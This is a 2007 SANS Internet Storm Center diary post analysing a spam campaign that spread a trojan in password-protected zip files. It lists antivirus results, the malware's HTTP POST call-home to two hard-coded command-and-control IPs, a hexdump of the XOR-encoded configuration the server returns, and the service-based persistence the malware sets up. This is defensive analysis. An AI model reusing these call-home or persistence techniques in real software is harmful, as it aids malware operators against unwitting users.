Threat Level: green Handler on Duty: Bojan Zdrnja

SANS ISC: InfoSec Handlers Diary Blog - New Malware SPAM InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

New Malware SPAM

Published: 2007-06-04
Last Updated: 2007-06-06 22:52:18 UTC
by Robert Danford (Version: 3)
0 comment(s)
One of our readers (thanks Michael S.) reported receiving a password protected zip file as SPAM with the password included in the HTML body of the email.

The SPAM From: line may show a news organization. However the actual sources of the email is all over the map (numerous broadband IPs on several continents). Hopefully most people have been trained to not trust the From: line or reply to spammy looking emails by now.

Sample Subject Lines:
Subject: Re: U.S. violent crime up again, more murders, robberies
Subject: Man Awakens From 19-Year Coma
Subject: Law hits Las Vegas 'fake' bands

Several of the samples included body text such as:

Decade Of Mystery: John Ramsey Speaks
Man wakes from 19-year coma in
Poland US vows to pursue hunt for missing soldiers
 Password for submitted attachment is xxx

Attachments include names such as "<news organization>-news<digits>.zip"

At the moment AV coverage (of the uncompressed file) is spotty

File size: 40960 bytes
MD5: efff306b3296b18a94fea8491b960ab0
SHA1: 11afce9edf86386f0383bd162cff428a7fdf27bd
packers: UPX
AhnLab-V3 2007.5.31.2 06.04.2007 no virus found
AntiVir 7.4.0.29 06.04.2007 no virus found
Authentium 4.93.8 05.23.2007 no virus found
Avast 4.7.997.0 06.04.2007 Win32:Agent-GPS
AVG 7.5.0.467 06.03.2007 no virus found
BitDefender 7.2 06.04.2007 no virus found
CAT-QuickHeal 9.00 06.04.2007 no virus found
ClamAV devel-20070416 06.04.2007 no virus found
DrWeb 4.33 06.04.2007 no virus found
eSafe 7.0.15.0 06.04.2007 suspicious Trojan/Worm
eTrust-Vet 30.7.3690 06.04.2007 no virus found
Ewido 4.0 06.04.2007 no virus found
FileAdvisor 1 06.04.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 suspicious
F-Prot 4.3.2.48 06.04.2007 no virus found
F-Secure 6.70.13030.0 06.04.2007 no virus found
Ikarus T3.1.1.8 06.04.2007 no virus found
Kaspersky 4.0.2.24 06.04.2007 no virus found
McAfee 5045 06.04.2007 no virus found
Microsoft 1.2503 06.04.2007 no virus found
NOD32v2 2307 06.04.2007 no virus found
Norman 5.80.02 06.04.2007 no virus found
Panda 9.0.0.4 06.04.2007 no virus found


The binary once executed appears to callhome via an HTTP POST to at least one of two websites:

216.40.204.106
ev1s-216-40-204-106.ev1servers.net
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
13749 | 216.40.204.106 | 216.40.192.0/20 | US | arin | 2000-10-05 | EVERYONES-INTERNET - Everyones Internet

74.52.72.58
3a.48.344a.static.theplanet.com
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
21844 | 74.52.72.58 | 74.52.0.0/16 | US | arin | 2006-02-17 | THEPLANET-AS - THE PLANET

Here are the partially sanitized details from one such call home:

POST /forum.php HTTP/1.1
Host: 216.40.204.106:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: */*
Accept-Language: en
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=4AFEAB473A5F7
Content-Length: 587

--4AFEAB473A5F7
Content-Disposition: form-data; name="sid"
1731421623279576
--4AFEAB473A5F7
Content-Disposition: form-data; name="up"
415735
--4AFEAB473A5F7
Content-Disposition: form-data; name="wbfl"
1
--4AFEAB473A5F7
Content-Disposition: form-data; name="v"
243
--4AFEAB473A5F7
Content-Disposition: form-data; name="ping"
768
--4AFEAB473A5F7
Content-Disposition: form-data; name="guid"
{BDDC89D0-27C5-449C-AD5C-6FCF1C875D65}
--4AFEAB473A5F7
Content-Disposition: form-data; name="wv"
5#2#2#0#2600#0
--4AFEAB473A5F7--

In response to this POST the webserver returns a binary file:

HTTP/1.1 200 OK
Date: Mon, 04 Jun 2007 17:22:01 GMT
Server: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e mod_autoindex_color PHP/5.2.1..X-Powered-By: PHP/5.2.1
Content-Length: 260
Connection: close
Content-Type: multipart/form-data; boundary="4AFEAB473A5F7"

--4AFEAB473A5F7
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
0d0a 2768 727f 252d 2e2d 2a2e 2928 2c2a ..'hr.%-.-*.)(,*
2a22 2b28 292d 2a27 3468 727f 2511 2779 *"+()-*'4hr.%.'y
7774 7870 2511 276d 2511 292f 2b11 2734 wtxp%.'m%.)/+.'4
6d25 1127 6825 112c 2f35 2e29 352c 2935 m%.'h%.,/5.)5,)5
2e23 2123 2b16 1129 2a2d 352f 2b35 292b .#!#+..)*-5/+5)+
2f35 2a2b 2d21 232b 1127 3468 2511 2734 /5*+-!#+.'4h%.'4
7977 7478 7025 ywtxp%
--4AFEAB473A5F7--

I have included the hexdump of COMMON.BIN unsanitized above for anyone wanting to take it apart (and please submit your analysis to our contact page if you would).
Possibly an encoded config file.

Here are the system modification details:
Creates file C:\WINDOWS\ws386.ini.
Creates file C:\WINDOWS\s32.txt.
Creates key "HKLM\System\CurrentControlSet\Services\aspimgr".
Sets value "ImagePath"="C:\WINDOWS\SYSTEM\aspimgr.exe" in key "HKLM\System\CurrentControlSet\Services\aspimgr".
Sets value "DisplayName"="Microsoft ASPI Manager" in key "HKLM\System\CurrentControlSet\Services\aspimgr".
Creates key "HKLM\Software\Microsoft\Sft".
Sets value "default"="{00000000-0000-0000-0000-00003F000F00}" in key "HKLM\Software\Microsoft\Sft".

In addition to our readers that submitted information I'd also like to thank the excellent analysis results from Anubis, Norman, and Sunbelt

Update1:
We had two readers (Rich and a 2nd submitter) send in the decoded values for COMMON.BIN.
Rich found the answer first by noticing a number of repeated characters and
trying to XOR each byte with all values between 0 and 255 in turn. Once he hit 27 (hex 0x1B) the
text was revealed.

<sid>1731421623279576</sid>
<block>
<v>
240
</v>
<s>
74.52.72.58:80
216.40.204.106:80
</s>
</block>


(The submitters will note the SID was altered to match the POST data above, as the real values themselves match)

The IP:PORTs listed in the <s> section were those observed as destinations for POST callhomes.
No passive-DNS replication data has been observed for either IP to date. So they are just hard-coding them.
<v> may be a version number, but does not match was the client sent.
Keywords:
0 comment(s)
Diary Archives